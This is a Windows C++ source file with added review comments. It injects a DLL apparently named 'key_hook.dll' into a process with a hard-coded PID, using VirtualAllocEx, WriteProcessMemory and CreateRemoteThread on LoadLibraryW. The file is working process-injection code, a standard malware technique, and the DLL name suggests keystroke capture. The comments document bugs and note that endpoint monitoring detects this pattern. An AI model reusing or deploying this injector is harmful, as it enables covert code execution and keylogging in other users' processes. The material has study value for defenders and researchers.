

// insertdll.cpp : Defines the entry point for the application. 
// 
 
#include "stdafx.h" 
#include  
#include  
#include  
void insertdll(void); 
void CheckError ( int, int, char *); 
PDWORD pdwThreadId;	// declared but never referenced in this file
HANDLE hRemoteThread, hRemoteProcess;	// kept at file scope so CheckError() can close them on any failure path
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;	// only dwRemoteProcessId is used (set in insertdll); fdwCreate/dwStackSize are unused, CreateRemoteThread gets literal 0s
PWSTR pszLibFileRemote=NULL;	// address of the path buffer inside the target process (from VirtualAllocEx); NULL until allocated, freed during cleanup
 
int APIENTRY WinMain(HINSTANCE hInstance, 
                     HINSTANCE hPrevInstance, 
                     LPSTR     lpCmdLine, 
                     int       nCmdShow) 
{
	/* Application entry point. None of the standard WinMain arguments are
	 * consulted: the whole program is the single call to insertdll(), which
	 * either finishes normally or terminates the process itself via
	 * CheckError(). Always reports success (0) when control returns here. */
	(void)hInstance;
	(void)hPrevInstance;
	(void)lpCmdLine;
	(void)nCmdShow;

	insertdll();

	return 0;
}
 
// Loads "d:\key_hook.dll" into the process whose PID is hard-coded below using
// the remote-thread sequence: OpenProcess -> VirtualAllocEx ->
// WriteProcessMemory(path) -> CreateRemoteThread(LoadLibraryW, path) ->
// WaitForSingleObject. Every Win32 failure is routed through CheckError(),
// which releases the file-scope handles/allocation and exits the process;
// on success the same cleanup runs at the end of this function.
// NOTE(review): this exact API sequence is what endpoint monitoring commonly
// reports as DLL injection; the file-scope globals exist only so that
// CheckError() can unwind whatever state was set up before the failure.
void insertdll(void) 
{ 
	int iReturnCode; 
	char lpDllFullPathName[MAX_PATH]; 
	WCHAR pszLibFileName[MAX_PATH]={0};	// zero-filled: the NUL terminator of the converted path comes from here (see MultiByteToWideChar below)
 
	dwRemoteProcessId = 1284;	// PID of the target process (hard-coded; nothing here validates it before OpenProcess) 
	strcpy(lpDllFullPathName, "d:\\key_hook.dll");	// DLL path; the unbounded copy is only safe because the source is a literal shorter than MAX_PATH 
 
	// Convert the ANSI path to UTF-16, because the remote start routine is LoadLibraryW.
	// The length passed is strlen() (no terminator), so the output is NUL-terminated only
	// thanks to the ={0} initialiser; a path of MAX_PATH or more characters would leave
	// pszLibFileName unterminated and lstrlenW() below would read past it.
	iReturnCode=MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS, 
						lpDllFullPathName,strlen(lpDllFullPathName), 
											pszLibFileName, MAX_PATH); 
	CheckError(iReturnCode, 0, "MultByteToWideChar");	// MultiByteToWideChar returns 0 on failure 
	// Open the target process with only the rights this sequence needs.
	hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD |		// needed by CreateRemoteThread 
								PROCESS_VM_OPERATION |		// needed by VirtualAllocEx / VirtualFreeEx  
									PROCESS_VM_WRITE,		// needed by WriteProcessMemory 
							FALSE, dwRemoteProcessId );	// non-inheritable handle 
	printf("OpenProcess OK\n");	// NOTE: printed before the handle is checked, so it also appears on failure 
	// OpenProcess returns NULL on failure. Casting a HANDLE to int truncates it on 64-bit
	// builds; the same applies to the (int) casts of pointers/handles further down.
	CheckError( (int) hRemoteProcess,NULL, "Remote Process not Exist or Access Denied!"); 
	// Bytes needed for the path in the target: +1 for the terminating NUL, so LoadLibraryW
	// in the target sees a properly terminated wide string.
	int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR); 
	// Reserve+commit a read/write buffer in the target's address space; the returned
	// address is only meaningful inside the target process (never dereference it here).
	pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE); 
	CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx"); 
		printf("VirtualAllocEx OK\n"); 
	// Copy the wide path (including its NUL) into the remote buffer.
	// The trailing NULL means the bytes-written count is not inspected; only the BOOL result is.
	iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL); 
	CheckError(iReturnCode, false, "WriteProcessMemory");	// WriteProcessMemory returns FALSE (0) on failure 
	// Resolve LoadLibraryW from this process's Kernel32.
	// NOTE(review): the address is used as-is in the target, so this assumes Kernel32 is
	// mapped at the same base there (same-bitness processes) — confirm for the deployment.
	PTHREAD_START_ROUTINE pfnStartAddr =(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW"); 
	CheckError((int)pfnStartAddr, NULL, "GetProcAddress");  
	// Start a thread in the target whose start routine is LoadLibraryW and whose single
	// argument is the remote path buffer. Stack size 0 and flags 0 are literals here;
	// the file-scope dwStackSize/fdwCreate globals are not consulted.
	hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL); 
		 
	CheckError((int)hRemoteThread, NULL, "Create Remote Thread"); 
		printf("CreateRemoteThread OK\n"); 
	// Block until the remote thread finishes. The return value is not checked and the
	// thread's exit code is never read, so a LoadLibraryW failure inside the target is
	// not detected by this program.
	WaitForSingleObject(hRemoteThread, INFINITE); 
	// Cleanup (printed after the wait has already completed).
	printf("WaitForSingleObject ...\n"); 
	// Release in the reverse order of acquisition: remote buffer, thread handle, process handle.
	if(pszLibFileRemote != NULL) 
	{	printf("VirtualFreeEx..\n"); 
		VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);	// MEM_RELEASE requires size 0 
	} 
	if(hRemoteThread != NULL) 
	{	printf("CloseHandle...\n"); 
		CloseHandle(hRemoteThread ); 
	} 
	if(hRemoteProcess!= NULL) 
	{	printf("CloseHandle...\n"); 
		CloseHandle(hRemoteProcess); 
	} 
} 
 
	//错误处理函数CheckError() 
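// Error handler shared by every Win32 call in insertdll().
// Treats iReturnCode == iErrorCode as failure: reports pErrorMsg together with
// the Win32 last-error code, releases whatever the file-scope globals
// (pszLibFileRemote, hRemoteThread, hRemoteProcess) currently hold, and
// terminates the process with a non-zero status. Returns normally otherwise.
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg) 
{
	if (iReturnCode != iErrorCode)
	{
		return;
	}

	// Capture the last-error code before any other call (printf included) can
	// overwrite it. DWORD is unsigned long, so %lu is the matching specifier
	// (the previous %d was a format/argument mismatch).
	DWORD dwLastError = GetLastError();
	printf("%s Error:%lu\n\n", pErrorMsg, dwLastError);

	// Unwind in the same order as the success path in insertdll(): remote
	// buffer first (MEM_RELEASE requires size 0), then the thread and process
	// handles. Anything still NULL was never acquired and is skipped.
	if (pszLibFileRemote != NULL)
	{
		VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
	}
	if (hRemoteThread != NULL)
	{
		CloseHandle(hRemoteThread);
	}
	if (hRemoteProcess != NULL)
	{
		CloseHandle(hRemoteProcess);
	}

	// Previously exit(0): an error path reported success to the caller/shell.
	exit(EXIT_FAILURE);
}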